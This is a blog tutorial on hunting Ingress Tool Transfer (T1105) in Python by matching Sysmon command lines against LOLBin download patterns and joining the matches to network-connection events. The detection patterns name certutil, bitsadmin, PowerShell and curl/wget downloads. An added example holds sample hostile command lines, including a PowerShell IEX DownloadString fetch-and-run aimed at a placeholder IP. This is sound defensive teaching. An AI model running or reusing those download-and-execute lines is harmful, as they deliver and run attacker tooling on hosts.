Charles Givre · Posted on May 31 · Originally published at gtkcyber.com

# Detecting Ingress Tool Transfer (T1105) with Python

Tags: cybersecurity, datascience, python, tutorial

After initial access, attackers almost always need to pull more tooling onto the host: a beacon, a credential dumper, a tunneler. That step is Ingress Tool Transfer (T1105) in MITRE ATT&CK, and it is hard to catch with signatures because the transfer mechanisms are legitimate. `certutil`, `bitsadmin`, `curl`, and PowerShell all download files for normal reasons. The signal is in the combination and the rarity, not the binary itself. This is where a little data science beats another detection rule.

Here is how to hunt T1105 in Python across three layers: the process command line, the process-to-network relationship, and the payload on the wire.

## Where T1105 Shows Up in Your Logs

Three sources cover most of it:

- Sysmon Event ID 1 (process creation) for the download command line and parent process
- Sysmon Event ID 3 (network connection) to confirm the process actually reached out
- Zeek `http.log` (or proxy logs) for the file coming across the wire

You can run all three as pandas DataFrames. No SIEM required, which matters when you are working an exported archive from a host you do not control.

## Catching LOLBin Downloaders in the Command Line

Start with the living-off-the-land binaries attackers reach for. Load Sysmon Event ID 1 and flag the download patterns:

```python
import pandas as pd

# Columns: UtcTime, Image, CommandLine, ParentImage, ProcessGuid
proc = pd.read_csv("sysmon_eid1.csv")

# Download patterns by LOLBin (see the LOLBAS project)
patterns = {
    "certutil": r"certutil.*(-urlcache|-f|-split).*http",
    "bitsadmin": r"bitsadmin.*(/transfer|/addfile)",
    "powershell": r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer)",
    "mshta": r"mshta.*http",
    "curl_wget": r"\b(curl|wget)\b.*http",
}

# Lowercase once so the patterns can stay case-insensitive
cmd = proc["CommandLine"].fillna("").str.lower()

# Loop body reconstructed from context: the source text breaks off after "for".
# One boolean column per LOLBin, then a combined flag for any match.
for name, pat in patterns.items():
    proc[name] = cmd.str.contains(pat, regex=True)
proc["t1105_cmdline"] = proc[list(patterns)].any(axis=1)
hits = proc.loc[proc["t1105_cmdline"], ["UtcTime", "ParentImage", "Image", "CommandLine", "ProcessGuid"]]
```
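The first two layers run end to end below, as an added example that is not the post's own code: it flags LOLBin download command lines with the same patterns, then joins the flagged `ProcessGuid`s to Sysmon Event ID 3 so only processes that actually connected out survive, carrying the parent image along for triage. The Sysmon records are constructed inline (203.0.113.10 is a documentation-range address), and the example uses only the standard library so it runs without pandas.

```python
import re

# Download patterns by LOLBin, matched against the lowercased command line
PATTERNS = {
    "certutil": r"certutil.*(-urlcache|-f|-split).*http",
    "bitsadmin": r"bitsadmin.*(/transfer|/addfile)",
    "powershell": r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer)",
    "mshta": r"mshta.*http",
    "curl_wget": r"\b(curl|wget)\b.*http",
}

# Constructed Sysmon records standing in for the exported CSVs (not real telemetry)
EID1 = [  # Event ID 1: process creation
    {"ProcessGuid": "{A1}", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.10/a.exe a.exe"},
    {"ProcessGuid": "{B2}", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "certutil.exe -verify cert.cer"},  # benign certutil use, no URL
    {"ProcessGuid": "{C3}", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell -nop -c IEX((New-Object Net.WebClient).DownloadString('http://203.0.113.10/p'))"},
    {"ProcessGuid": "{D4}", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "bitsadmin /transfer job /download /priority high http://203.0.113.10/b.exe C:\\Users\\Public\\b.exe"},
]
EID3 = [  # Event ID 3: network connection; {D4} has none, so its download never happened
    {"ProcessGuid": "{A1}", "DestinationIp": "203.0.113.10", "DestinationPort": 80},
    {"ProcessGuid": "{C3}", "DestinationIp": "203.0.113.10", "DestinationPort": 80},
]


def flag_downloaders(eid1):
    """Layer 1: map ProcessGuid -> names of the LOLBin patterns its command line matched."""
    hits = {}
    for rec in eid1:
        cmd = (rec.get("CommandLine") or "").lower()
        matched = [name for name, pat in PATTERNS.items() if re.search(pat, cmd)]
        if matched:
            hits[rec["ProcessGuid"]] = matched
    return hits


def confirm_with_network(hits, eid1, eid3):
    """Layer 2: keep flagged processes that Sysmon also saw connect out (join on ProcessGuid)."""
    conns = {}
    for c in eid3:
        conns.setdefault(c["ProcessGuid"], []).append(f'{c["DestinationIp"]}:{c["DestinationPort"]}')
    parents = {r["ProcessGuid"]: r["ParentImage"] for r in eid1}
    return [{"ProcessGuid": g, "patterns": p, "parent": parents[g], "destinations": conns[g]}
            for g, p in hits.items() if g in conns]


if __name__ == "__main__":
    for row in confirm_with_network(flag_downloaders(EID1), EID1, EID3):
        print(row)
```

A command-line hit with no matching Event ID 3 (here `{D4}`) is still worth a look, but it is a failed or blocked transfer, not a confirmed one, which is why the join is kept separate from the flagging.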
